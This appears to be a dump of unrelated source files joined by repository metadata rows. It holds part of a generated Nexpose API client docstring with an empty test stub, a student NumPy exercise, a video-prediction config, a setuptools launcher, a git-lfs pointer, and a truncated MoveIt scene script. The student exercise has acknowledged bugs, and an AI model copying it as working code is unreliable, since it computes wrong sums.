In this situation, instead of a `201 CREATED` response, the `202 ACCEPTED` response indicates that processing of the request is not fully complete but has been accepted for future processing. This request will respond similarly with a `Location` header with link to the job-oriented asynchronous resource that was created and/or queued. #### PUT The `PUT` is an idempotent operation that either performs a create with user-supplied identity, or a full replace or update of a resource by a known identifier. The response to a `PUT` operation to create an entity is a `201 Created` with a valid `Location` header field set to the URI that can be used to access to the newly created resource. `PUT` on a collection resource replaces all values in the collection. The typical response to a `PUT` operation that updates an entity is hypermedia links, which may link to related resources caused by the side-effects of the changes performed. #### DELETE The `DELETE` is an idempotent operation that physically deletes a resource, or removes an association between resources. The typical response to a `DELETE` operation is hypermedia links, which may link to related resources caused by the side-effects of the changes performed. ### Instance Resources Instance resources can support the `GET`, `PUT`, `POST`, `PATCH` and `DELETE` operations. #### GET Retrieves the details of a specific resource by its identifier. The details retrieved can be controlled through property selection and property views. The content of the resource is returned within the body of the response in the acceptable media type. #### PUT Allows for and idempotent \"full update\" (complete replacement) on a specific resource. If the resource does not exist, it will be created; if it does exist, it is completely overwritten. Any omitted properties in the request are assumed to be undefined/null. For \"partial updates\" use `POST` or `PATCH` instead. The content of the `PUT` request is sent in the request body. 
The identifier of the resource is specified within the URL (not the request body). The response to a successful `PUT` request is a `201 CREATED` to represent the created status, with a valid `Location` header field set to the URI that can be used to access to the newly created (or fully replaced) resource. #### POST Performs a non-idempotent creation of a new resource. The `POST` of an instance resource most commonly occurs with the use of nested resources (e.g. searching on a parent collection resource). The response to a `POST` of an instance resource is typically a `200 OK` if the resource is non-persistent, and a `201 CREATED` if there is a resource created/persisted as a result of the operation. This varies by endpoint. #### PATCH The `PATCH` operation is used to perform a partial update of a resource. `PATCH` is a non-idempotent operation that enforces an atomic mutation of a resource. Only the properties specified in the request are to be overwritten on the resource it is applied to. If a property is missing, it is assumed to not have changed. #### DELETE Permanently removes the individual resource from the system. If the resource is an association between resources, only the association is removed, not the resources themselves. A successful deletion of the resource should return `204 NO CONTENT` with no response body. This operation is not fully idempotent, as follow-up requests to delete a non-existent resource should return a `404 NOT FOUND`. ## Requests Unless otherwise indicated, the default request body media type is `application/json`. ### Headers Commonly used request headers include: | Header | Example | Purpose | | ------------------ | --------------------------------------------- | ---------------------------------------------------------------------------------------------- | | `Accept` | `application/json` | Defines what acceptable content types are allowed by the client. For all types, use `*/*`. 
| | `Accept-Encoding` | `deflate, gzip` | Allows for the encoding to be specified (such as gzip). | | `Accept-Language` | `en-US` | Indicates to the server the client's locale (defaults `en-US`). | | `Authorization ` | `Basic Base64(\"username:password\")` | Basic authentication | | `Token ` | `123456` | Two-factor authentication token (if enabled) | ### Dates & Times Dates and/or times are specified as strings in the ISO 8601 format(s). The following formats are supported as input: | Value | Format | Notes | | --------------------------- | ------------------------------------------------------ | ----------------------------------------------------- | | Date | YYYY-MM-DD | Defaults to 12 am UTC (if used for a date & time | | Date & time only | YYYY-MM-DD'T'hh:mm:ss[.nnn] | Defaults to UTC | | Date & time in UTC | YYYY-MM-DD'T'hh:mm:ss[.nnn]Z | | | Date & time w/ offset | YYYY-MM-DD'T'hh:mm:ss[.nnn][+|-]hh:mm | | | Date & time w/ zone-offset | YYYY-MM-DD'T'hh:mm:ss[.nnn][+|-]hh:mm[<zone-id>] | | ### Timezones Timezones are specified in the regional zone format, such as `\"America/Los_Angeles\"`, `\"Asia/Tokyo\"`, or `\"GMT\"`. ### Paging Pagination is supported on certain collection resources using a combination of two query parameters, `page` and `size`. As these are control parameters, they are prefixed with the underscore character. The page parameter dictates the zero-based index of the page to retrieve, and the `size` indicates the size of the page. For example, `/resources?page=2&size=10` will return page 3, with 10 records per page, giving results 21-30. The maximum page size for a request is 500. ### Sorting Sorting is supported on paginated resources with the `sort` query parameter(s). The sort query parameter(s) supports identifying a single or multi-property sort with a single or multi-direction output. The format of the parameter is: ``` sort=property[,ASC|DESC]... 
``` Therefore, the request `/resources?sort=name,title,DESC` would return the results sorted by the name and title descending, in that order. The sort directions are either ascending `ASC` or descending `DESC`. With single-order sorting, all properties are sorted in the same direction. To sort the results with varying orders by property, multiple sort parameters are passed. For example, the request `/resources?sort=name,ASC&sort=title,DESC` would sort by name ascending and title descending, in that order. ## Responses The following response statuses may be returned by this API. | Status | Meaning | Usage | | ------ | ------------------------ |------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `200` | OK | The operation performed without error according to the specification of the request, and no more specific 2xx code is suitable. | | `201` | Created | A create request has been fulfilled and a resource has been created. The resource is available as the URI specified in the response, including the `Location` header. | | `202` | Accepted | An asynchronous task has been accepted, but not guaranteed, to be processed in the future. | | `400` | Bad Request | The request was invalid or cannot be otherwise served. The request is not likely to succeed in the future without modifications. | | `401` | Unauthorized | The user is unauthorized to perform the operation requested, or does not maintain permissions to perform the operation on the resource specified. | | `403` | Forbidden | The resource exists to which the user has access, but the operating requested is not permitted. | | `404` | Not Found | The resource specified could not be located, does not exist, or an unauthenticated client does not have permissions to a resource. | | `405` | Method Not Allowed | The operations may not be performed on the specific resource. 
Allowed operations are returned and may be performed on the resource. | | `408` | Request Timeout | The client has failed to complete a request in a timely manner and the request has been discarded. | | `413` | Request Entity Too Large | The request being provided is too large for the server to accept processing. | | `415` | Unsupported Media Type | The media type is not supported for the requested resource. | | `500` | Internal Server Error | An internal and unexpected error has occurred on the server at no fault of the client. | ### Security The response statuses 401, 403 and 404 need special consideration for security purposes. As necessary, error statuses and messages may be obscured to strengthen security and prevent information exposure. The following is a guideline for privileged resource response statuses: | Use Case | Access | Resource | Permission | Status | | ------------------------------------------------------------------ | ------------------ |------------------- | ------------ | ------------ | | Unauthenticated access to an unauthenticated resource. | Unauthenticated | Unauthenticated | Yes | `20x` | | Unauthenticated access to an authenticated resource. | Unauthenticated | Authenticated | No | `401` | | Unauthenticated access to an authenticated resource. | Unauthenticated | Non-existent | No | `401` | | Authenticated access to a unauthenticated resource. | Authenticated | Unauthenticated | Yes | `20x` | | Authenticated access to an authenticated, unprivileged resource. | Authenticated | Authenticated | No | `404` | | Authenticated access to an authenticated, privileged resource. 
| Authenticated | Authenticated | Yes | `20x` | | Authenticated access to an authenticated, non-existent resource | Authenticated | Non-existent | Yes | `404` | ### Headers Commonly used response headers include: | Header | Example | Purpose | | -------------------------- | --------------------------------- | --------------------------------------------------------------- | | `Allow` | `OPTIONS, GET` | Defines the allowable HTTP operations on a resource. | | `Cache-Control` | `no-store, must-revalidate` | Disables caching of resources (as they are all dynamic). | | `Content-Encoding` | `gzip` | The encoding of the response body (if any). | | `Location` | | Refers to the URI of the resource created by a request. | | `Transfer-Encoding` | `chunked` | Specified the encoding used to transform response. | | `Retry-After` | 5000 | Indicates the time to wait before retrying a request. | | `X-Content-Type-Options` | `nosniff` | Disables MIME type sniffing. | | `X-XSS-Protection` | `1; mode=block` | Enables XSS filter protection. | | `X-Frame-Options` | `SAMEORIGIN` | Prevents rendering in a frame from a different origin. | | `X-UA-Compatible` | `IE=edge,chrome=1` | Specifies the browser mode to render in. | ### Format When `application/json` is returned in the response body it is always pretty-printed (indented, human readable output). Additionally, gzip compression/encoding is supported on all responses. #### Dates & Times Dates or times are returned as strings in the ISO 8601 'extended' format. When a date and time is returned (instant) the value is converted to UTC. For example: | Value | Format | Example | | --------------- | ------------------------------ | --------------------- | | Date | `YYYY-MM-DD` | 2017-12-03 | | Date & Time | `YYYY-MM-DD'T'hh:mm:ss[.nnn]Z` | 2017-12-03T10:15:30Z | #### Content In some resources a Content data type is used. This allows for multiple formats of representation to be returned within resource, specifically `\"html\"` and `\"text\"`. 
The `\"text\"` property returns a flattened representation suitable for output in textual displays. The `\"html\"` property returns an HTML fragment suitable for display within an HTML element. Note, the HTML returned is not a valid stand-alone HTML document. #### Paging The response to a paginated request follows the format: ```json { resources\": [ ... ], \"page\": { \"number\" : ..., \"size\" : ..., \"totalResources\" : ..., \"totalPages\" : ... }, \"links\": [ \"first\" : { \"href\" : \"...\" }, \"prev\" : { \"href\" : \"...\" }, \"self\" : { \"href\" : \"...\" }, \"next\" : { \"href\" : \"...\" }, \"last\" : { \"href\" : \"...\" } ] } ``` The `resources` property is an array of the resources being retrieved from the endpoint, each which should contain at minimum a \"self\" relation hypermedia link. The `page` property outlines the details of the current page and total possible pages. The object for the page includes the following properties: - number - The page number (zero-based) of the page returned. - size - The size of the pages, which is less than or equal to the maximum page size. - totalResources - The total amount of resources available across all pages. - totalPages - The total amount of pages. The last property of the paged response is the `links` array, which contains all available hypermedia links. For paginated responses, the \"self\", \"next\", \"previous\", \"first\", and \"last\" links are returned. The \"self\" link must always be returned and should contain a link to allow the client to replicate the original request against the collection resource in an identical manner to that in which it was invoked. The \"next\" and \"previous\" links are present if either or both there exists a previous or next page, respectively. The \"next\" and \"previous\" links have hrefs that allow \"natural movement\" to the next page, that is all parameters required to move the next page are provided in the link. 
The \"first\" and \"last\" links provide references to the first and last pages respectively. Requests outside the boundaries of the pageable will result in a `404 NOT FOUND`. Paginated requests do not provide a \"stateful cursor\" to the client, nor does it need to provide a read consistent view. Records in adjacent pages may change while pagination is being traversed, and the total number of pages and resources may change between requests within the same filtered/queries resource collection. #### Property Views The \"depth\" of the response of a resource can be configured using a \"view\". All endpoints supports two views that can tune the extent of the information returned in the resource. The supported views are `summary` and `details` (the default). View are specified using a query parameter, in this format: ```bash /<resource>?view={viewName} ``` #### Error Any error responses can provide a response body with a message to the client indicating more information (if applicable) to aid debugging of the error. All 40x and 50x responses will return an error response in the body. The format of the response is as follows: ```json { \"status\": <statusCode>, \"message\": <message>, \"links\" : [ { \"rel\" : \"...\", \"href\" : \"...\" } ] } ``` The `status` property is the same as the HTTP status returned in the response, to ease client parsing. The message property is a localized message in the request client's locale (if applicable) that articulates the nature of the error. The last property is the `links` property. This may contain additional [hypermedia links](#section/Overview/Authentication) to troubleshoot. #### Search Criteria <a section=\"section/Responses/SearchCriteria\"></a> Multiple resources make use of search criteria to match assets. Search criteria is an array of search filters. 
Each search filter has a generic format of: ```json { \"field\": \"<field-name>\", \"operator\": \"<operator>\", [\"value\": \"<value>\",] [\"lower\": \"<value>\",] [\"upper\": \"<value>\"] } ``` Every filter defines two required properties `field` and `operator`. The field is the name of an asset property that is being filtered on. The operator is a type and property-specific operating performed on the filtered property. The valid values for fields and operators are outlined in the table below. Every filter also defines one or more values that are supplied to the operator. The valid values vary by operator and are outlined below. ##### Fields The following table outlines the search criteria fields and the available operators: | Field | Operators | | --------------------------------- | ------------------------------------------------------------------------------------------------------------------------------ | | `alternate-address-type` | `in` | | `container-image` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is like` ` not like` | | `container-status` | `is` ` is not` | | `containers` | `are` | | `criticality-tag` | `is` ` is not` ` is greater than` ` is less than` ` is applied` ` is not applied` | | `custom-tag` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is applied` ` is not applied` | | `cve` | `is` ` is not` ` contains` ` does not contain` | | `cvss-access-complexity` | `is` ` is not` | | `cvss-authentication-required` | `is` ` is not` | | `cvss-access-vector` | `is` ` is not` | | `cvss-availability-impact` | `is` ` is not` | | `cvss-confidentiality-impact` | `is` ` is not` | | `cvss-integrity-impact` | `is` ` is not` | | `cvss-v3-confidentiality-impact` | `is` ` is not` | | `cvss-v3-integrity-impact` | `is` ` is not` | | `cvss-v3-availability-impact` | `is` ` is not` | | `cvss-v3-attack-vector` | `is` ` is not` | | `cvss-v3-attack-complexity` | `is` ` is not` | | `cvss-v3-user-interaction` 
| `is` ` is not` | | `cvss-v3-privileges-required` | `is` ` is not` | | `host-name` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is empty` ` is not empty` ` is like` ` not like` | | `host-type` | `in` ` not in` | | `ip-address` | `is` ` is not` ` in range` ` not in range` ` is like` ` not like` | | `ip-address-type` | `in` ` not in` | | `last-scan-date` | `is-on-or-before` ` is on or after` ` is between` ` is earlier than` ` is within the last` | | `location-tag` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is applied` ` is not applied` | | `mobile-device-last-sync-time` | `is-within-the-last` ` is earlier than` | | `open-ports` | `is` ` is not` ` in range` | | `operating-system` | `contains` ` does not contain` ` is empty` ` is not empty` | | `owner-tag` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is applied` ` is not applied` | | `pci-compliance` | `is` | | `risk-score` | `is` ` is not` ` in range` ` greater than` ` less than` | | `service-name` | `contains` ` does not contain` | | `site-id` | `in` ` not in` | | `software` | `contains` ` does not contain` | | `vAsset-cluster` | `is` ` is not` ` contains` ` does not contain` ` starts with` | | `vAsset-datacenter` | `is` ` is not` | | `vAsset-host-name` | `is` ` is not` ` contains` ` does not contain` ` starts with` | | `vAsset-power-state` | `in` ` not in` | | `vAsset-resource-pool-path` | `contains` ` does not contain` | | `vulnerability-assessed` | `is-on-or-before` ` is on or after` ` is between` ` is earlier than` ` is within the last` | | `vulnerability-category` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` | | `vulnerability-cvss-v3-score` | `is` ` is not` | | `vulnerability-cvss-score` | `is` ` is not` ` in range` ` is greater than` ` is less than` | | `vulnerability-exposures` | `includes` ` does not include` | | `vulnerability-title` | `contains` ` does not contain` ` is` 
` is not` ` starts with` ` ends with` | | `vulnerability-validated-status` | `are` | ##### Enumerated Properties The following fields have enumerated values: | Field | Acceptable Values | | ----------------------------------------- | ------------------------------------------------------------------------------------------------------------- | | `alternate-address-type` | 0=IPv4, 1=IPv6 | | `containers` | 0=present, 1=not present | | `container-status` | `created` `running` `paused` `restarting` `exited` `dead` `unknown` | | `cvss-access-complexity` | <ul><li><code>L</code> = Low</li><li><code>M</code> = Medium</li><li><code>H</code> = High</li></ul> | | `cvss-integrity-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-confidentiality-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-availability-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-access-vector` | <ul><li><code>L</code> = Local</li><li><code>A</code> = Adjacent</li><li><code>N</code> = Network</li></ul> | | `cvss-authentication-required` | <ul><li><code>N</code> = None</li><li><code>S</code> = Single</li><li><code>M</code> = Multiple</li></ul> | | `cvss-v3-confidentiality-impact` | <ul><li><code>L</code> = Local</li><li><code>L</code> = Low</li><li><code>N</code> = None</li><li><code>H</code> = High</li></ul> | | `cvss-v3-integrity-impact` | <ul><li><code>L</code> = Local</li><li><code>L</code> = Low</li><li><code>N</code> = None</li><li><code>H</code> = High</li></ul> | | `cvss-v3-availability-impact` | <ul><li><code>N</code> = None</li><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `cvss-v3-attack-vector` | <ul><li><code>N</code> = Network</li><li><code>A</code> = Adjacent</li><li><code>L</code> = Local</li><li><code>P</code> = Physical</li></ul> | | 
`cvss-v3-attack-complexity` | <ul><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `cvss-v3-user-interaction` | <ul><li><code>N</code> = None</li><li><code>R</code> = Required</li></ul> | | `cvss-v3-privileges-required` | <ul><li><code>N</code> = None</li><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `host-type` | 0=Unknown, 1=Guest, 2=Hypervisor, 3=Physical, 4=Mobile | | `ip-address-type` | 0=IPv4, 1=IPv6 | | `pci-compliance` | 0=fail, 1=pass | | `vulnerability-validated-status` | 0=present, 1=not present | ##### Operator Properties <a section=\"section/Responses/SearchCriteria/OperatorProperties\"></a> The following table outlines which properties are required for each operator and the appropriate data type(s): | Operator | `value` | `lower` | `upper` | | ----------------------|-----------------------|-----------------------|-----------------------| | `are` | `string` | | | | `contains` | `string` | | | | `does-not-contain` | `string` | | | | `ends with` | `string` | | | | `in` | `Array[ string ]` | | | | `in-range` | | `numeric` | `numeric` | | `includes` | `Array[ string ]` | | | | `is` | `string` | | | | `is-applied` | | | | | `is-between` | | `numeric` | `numeric` | | `is-earlier-than` | `numeric` | | | | `is-empty` | | | | | `is-greater-than` | `numeric` | | | | `is-on-or-after` | `string` (yyyy-MM-dd) | | | | `is-on-or-before` | `string` (yyyy-MM-dd) | | | | `is-not` | `string` | | | | `is-not-applied` | | | | | `is-not-empty` | | | | | `is-within-the-last` | `string` | | | | `less-than` | `string` | | | | `like` | `string` | | | | `not-contains` | `string` | | | | `not-in` | `Array[ string ]` | | | | `not-in-range` | | `numeric` | `numeric` | | `not-like` | `string` | | | | `starts-with` | `string` | | | #### Discovery Connection Search Criteria <a section=\"section/Responses/DiscoverySearchCriteria\"></a> Dynamic sites make use of search criteria to match assets from a discovery connection. 
Search criteria is an array of search filters. Each search filter has a generic format of: ```json { \"field\": \"<field-name>\", \"operator\": \"<operator>\", [\"value\": \"<value>\",] [\"lower\": \"<value>\",] [\"upper\": \"<value>\"] } ``` Every filter defines two required properties `field` and `operator`. The field is the name of an asset property that is being filtered on. The list of supported fields vary depending on the type of discovery connection configured for the dynamic site (e.g vSphere, ActiveSync, etc.). The operator is a type and property-specific operating performed on the filtered property. The valid values for fields outlined in the tables below and are grouped by the type of connection. Every filter also defines one or more values that are supplied to the operator. See <a href=\"#section/Responses/SearchCriteria/OperatorProperties\">Search Criteria Operator Properties</a> for more information on the valid values for each operator. ##### Fields (ActiveSync) This section documents search criteria information for ActiveSync discovery connections. The discovery connections must be one of the following types: `\"activesync-ldap\"`, `\"activesync-office365\"`, or `\"activesync-powershell\"`. The following table outlines the search criteria fields and the available operators for ActiveSync connections: | Field | Operators | | --------------------------------- | ------------------------------------------------------------- | | `last-sync-time` | `is-within-the-last` ` is-earlier-than` | | `operating-system` | `contains` ` does-not-contain` | | `user` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (AWS) This section documents search criteria information for AWS discovery connections. The discovery connections must be the type `\"aws\"`. 
The following table outlines the search criteria fields and the available operators for AWS connections: | Field | Operators | | ----------------------- | ------------------------------------------------------------- | | `availability-zone` | `contains` ` does-not-contain` | | `guest-os-family` | `contains` ` does-not-contain` | | `instance-id` | `contains` ` does-not-contain` | | `instance-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `instance-state` | `in` ` not-in` | | `instance-type` | `in` ` not-in` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `region` | `in` ` not-in` | | `vpc-id` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (DHCP) This section documents search criteria information for DHCP discovery connections. The discovery connections must be the type `\"dhcp\"`. The following table outlines the search criteria fields and the available operators for DHCP connections: | Field | Operators | | --------------- | ------------------------------------------------------------- | | `host-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `mac-address` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (Sonar) This section documents search criteria information for Sonar discovery connections. The discovery connections must be the type `\"sonar\"`. The following table outlines the search criteria fields and the available operators for Sonar connections: | Field | Operators | | ------------------- | -------------------- | | `search-domain` | `contains` ` is` | | `ip-address` | `in-range` ` is` | | `sonar-scan-date` | `is-within-the-last` | ##### Fields (vSphere) This section documents search criteria information for vSphere discovery connections. The discovery connections must be the type `\"vsphere\"`. 
The following table outlines the search criteria fields and the available operators for vSphere connections: | Field | Operators | | -------------------- | ------------------------------------------------------------------------------------------ | | `cluster` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `data-center` | `is` ` is-not` | | `discovered-time` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `guest-os-family` | `contains` ` does-not-contain` | | `host-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `power-state` | `in` ` not-in` | | `resource-pool-path` | `contains` ` does-not-contain` | | `last-time-seen` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `vm` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Enumerated Properties (vSphere) The following fields have enumerated values: | Field | Acceptable Values | | ------------- | ------------------------------------ | | `power-state` | `poweredOn` `poweredOff` `suspended` | ## HATEOAS This API follows Hypermedia as the Engine of Application State (HATEOAS) principals and is therefore hypermedia friendly. Hyperlinks are returned in the `links` property of any given resource and contain a fully-qualified hyperlink to the corresponding resource. The format of the hypermedia link adheres to both the <a target=\"_blank\" href=\"http://jsonapi.org\">{json:api} v1</a> <a target=\"_blank\" href=\"http://jsonapi.org/format/#document-links\">\"Link Object\"</a> and <a target=\"_blank\" href=\"http://json-schema.org/latest/json-schema-hypermedia.html\">JSON Hyper-Schema</a> <a target=\"_blank\" href=\"http://json-schema.org/latest/json-schema-hypermedia.html#rfc.section.5.2\">\"Link Description Object\"</a> formats. 
For example: ```json \"links\": [{ \"rel\": \"<relation>\", \"href\": \"<href>\" ... }] ``` Where appropriate link objects may also contain additional properties than the `rel` and `href` properties, such as `id`, `type`, etc. See the [Root](#tag/Root) resources for the entry points into API discovery. # noqa: E501
OpenAPI spec version: 3
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import nexpose_client
from nexpose_client.models.token_resource import TokenResource # noqa: E501
from nexpose_client.rest import ApiException
class TestTokenResource(unittest.TestCase):
    """Generated unit-test stubs for the TokenResource model."""

    def setUp(self):
        # These stubs need no shared fixtures.
        pass

    def tearDown(self):
        # Nothing was allocated in setUp, so nothing to release.
        pass

    def testTokenResource(self):
        """Test TokenResource"""
        # FIXME: construct object with mandatory attributes with example values
        # model = nexpose_client.models.token_resource.TokenResource()  # noqa: E501
        pass


if __name__ == '__main__':
    unittest.main()
| [
"[email protected]"
] | |
e2bd9a59636cfd0c2f76a1a4087cc2c5202b1935 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/216/usersdata/274/113966/submittedfiles/av2_p3_civil.py | d9f4bcefea50acc8b1dd920d630cdd854f8a3254 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 458 | py | # -*- coding: utf-8 -*-
import numpy as np
# Reads a square L-by-L matrix element by element and accumulates sums of
# selected entries relative to the position (x, y).
L=int(input("Quantidade de Linhas: "))  # number of rows (matrix is square)
C=L  # number of columns equals number of rows
a=np.zeros((L,C))  # the matrix, filled from user input below
x=int(input("Linhas: "))  # row index of interest (assumed 0-based -- TODO confirm)
y=int(input("Colunas: "))  # column index of interest (assumed 0-based -- TODO confirm)
# Prompt for every element, row by row.
for i in range(0,a.shape[0],1):
    for j in range(0,a.shape[1],1):
        a[i,j]=float(input("Valor da Linha: "))
# Sum of row-x entries a[x, x+1] .. a[x, C-y] (loop index i runs x .. C-y-1).
soma1L=0
for i in range(x,C-y,1):
    soma1L=soma1L+a[x,i+1]
# NOTE(review): this adds the ENTIRE matrix 'a' to the accumulator each
# iteration, turning soma2L into an L-by-L array -- almost certainly a bug;
# an individual element such as a[x, i] was probably intended. TODO confirm.
soma2L=0
for i in range(x,y,1):
    soma2L=soma2L+a
# NOTE(review): identical to the soma1L loop above, so soma1C == soma1L;
# a column sum (e.g. a[i+1, y]) was probably intended here. TODO confirm.
soma1C=0
for i in range(x,C-y,1):
    soma1C=soma1C+a[x,i+1]
| [
"[email protected]"
] | |
fe03327e97fff1983eaee4dd0427062b9d600377 | 05cda3ab89d001aef2ec19f2975fad9397c8dd0b | /experiments/sawyer/towel_classifier/conf.py | bec399b3897f8ecb885707dcf2e8c6335cc1ab37 | [
"MIT"
] | permissive | dhl8282/visual_foresight | ddcc940ad542222d433ca269e37e4d5f747732ea | 5e6205a85119c1dec4a39ba7e67d7c89e726a47c | refs/heads/master | 2022-09-05T18:16:07.590072 | 2020-05-26T08:41:52 | 2020-05-26T08:41:52 | 266,988,765 | 0 | 0 | MIT | 2020-05-26T08:36:22 | 2020-05-26T08:36:22 | null | UTF-8 | Python | false | false | 988 | py | from visual_mpc.video_prediction.setup_predictor import setup_predictor
from visual_mpc.video_prediction.vpred_model_interface import VPred_Model_Interface
from video_prediction.models.savp_model import SAVPVideoPredictionModel
import robonet
modeldir = '/home/sudeep/Documents/video_prediction/pretrained_models/mixed_datasets/towel_hard_objects/view0/'
configuration = {
'pred_model': VPred_Model_Interface,
'pred_model_class': SAVPVideoPredictionModel,
'setup_predictor':setup_predictor,
'json_dir': modeldir + '/model.savp.None',
'pretrained_model':modeldir + '/model.savp.None/model-300000', # 'filepath of a pretrained model to resume training from.' ,
'sequence_length': 15, # 'sequence length to load, including context frames.' ,
'context_frames': 2, # of frames before predictions.' ,
'model': 'appflow', #'model architecture to use - CDNA, DNA, or STP' ,
'batch_size': 50,
'sdim':8,
'adim':4,
'orig_size':[48,64],
'no_pix_distrib': '',
'ncam': 1
}
| [
"[email protected]"
] | |
9d8c079179f285f75f1695a88d4e3807acf800c1 | ced968634cb9c6ee4677cd747b02b0a656ba3221 | /env/bin/easy_install | 98cbe45bf86c8f2fafe9ddf8b0ac9682e7acd4e4 | [] | no_license | veganna/hori | ad5c171fd0ea936f047cc375991e9f7a438df7ab | 92e195d9844e08bd9c9cbbbb4d1e1e6eef738461 | refs/heads/main | 2023-09-02T05:53:50.756717 | 2021-11-07T18:12:09 | 2021-11-07T18:12:09 | 425,580,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 244 | #!/home/mainsite/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
78278e990a57092f2ec56732405baf87e7f9f84d | 1fe8d4133981e53e88abf633046060b56fae883e | /venv/lib/python3.8/site-packages/tensorflow/python/layers/normalization.py | 2ff79b4f2e9ffe0a6b49bfc40e106c0aa66daffd | [] | no_license | Akira331/flask-cifar10 | 6c49db8485038731ce67d23f0972b9574746c7a7 | 283e7a2867c77d4b6aba7aea9013bf241d35d76c | refs/heads/master | 2023-06-14T16:35:06.384755 | 2021-07-05T14:09:15 | 2021-07-05T14:09:15 | 382,864,970 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:6ba7d44e910c3440fadfac158cda4aa0136a4447c84f005b7144e6cd9b29444d
size 17101
| [
"[email protected]"
] | |
85ae43871dcc3db57959c181396ab5c178961f2e | 330285bea42e66b1975d62e2f4dd742d4c3ab360 | /franka_moveit/scripts/create_demo_planning_scene.py | 9916a164cc43bf4866b219c232f5d029ec8d94c9 | [
"Apache-2.0"
] | permissive | justagist/franka_ros_interface | 946182e0430d21a9c119470729d7ec5e96caa404 | f1f3649a4b030a9191e0577d980680ec95afa6ab | refs/heads/master | 2021-12-24T22:22:14.599033 | 2021-12-22T13:42:30 | 2021-12-22T13:42:30 | 199,485,892 | 130 | 51 | Apache-2.0 | 2021-05-03T17:11:32 | 2019-07-29T16:07:08 | Python | UTF-8 | Python | false | false | 3,226 | py | #!/usr/bin/env python
# /***************************************************************************
#
# @package: franka_moveit
# @metapackage: franka_ros_interface
# @author: Saif Sidhik <[email protected]>
#
# **************************************************************************/
# /***************************************************************************
# Copyright (c) 2019-2021, Saif Sidhik
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# **************************************************************************/
import sys
import rospy
import moveit_commander
from franka_moveit import ExtendedPlanningSceneInterface
from franka_moveit.utils import create_pose_stamped_msg
"""
A script for creating a simple environment as a PlanningScene. This script runs
by default when interface.launch is started, but can be disabled using argument.
"""
# Collision boxes approximating the IRLab workspace around the Panda arm.
# Each dict is a set of keyword arguments for ExtendedPlanningSceneInterface
# .add_box():
#   name: identifier of the scene object
#   pose: centre pose of the box, expressed in the 'panda_link0' frame
#         (quaternion [1,0,0,0]; exact convention is defined by
#         create_pose_stamped_msg -- TODO confirm w-first vs x-first)
#   size: box extents -- presumably [x, y, z] in metres; TODO confirm units
IRLab_workspace = [
        {
            'name': 'back_wall',
            'pose': create_pose_stamped_msg(position = [-0.57,0.0,0.5], orientation = [1,0,0,0], frame = 'panda_link0'),
            'size': [0.1,1.8,1]
        },
        {
            'name': 'side_wall',
            'pose': create_pose_stamped_msg(position = [-0.3,-0.85,0.5], orientation = [1,0,0,0], frame = 'panda_link0'),
            'size': [0.6,0.1,1]
        },
        {
            'name': 'table',
            'pose': create_pose_stamped_msg(position = [0.45,-0.0,0], orientation = [1,0,0,0], frame = 'panda_link0'),
            'size': [2,1.8,0.02]
        },
        {
            'name': 'controller_box',
            'pose': create_pose_stamped_msg(position = [-0.37,0.55,0.08], orientation = [1,0,0,0], frame = 'panda_link0'),
            'size': [0.4,0.6,0.16]
        },
        {
            'name': 'equipment_box',
            'pose': create_pose_stamped_msg(position = [-0.35,-0.68,0.17], orientation = [1,0,0,0], frame = 'panda_link0'),
            'size': [0.46,0.4,0.34]
        }
]
def main():
    """Populate the MoveIt planning scene with the IRLab workspace obstacles.

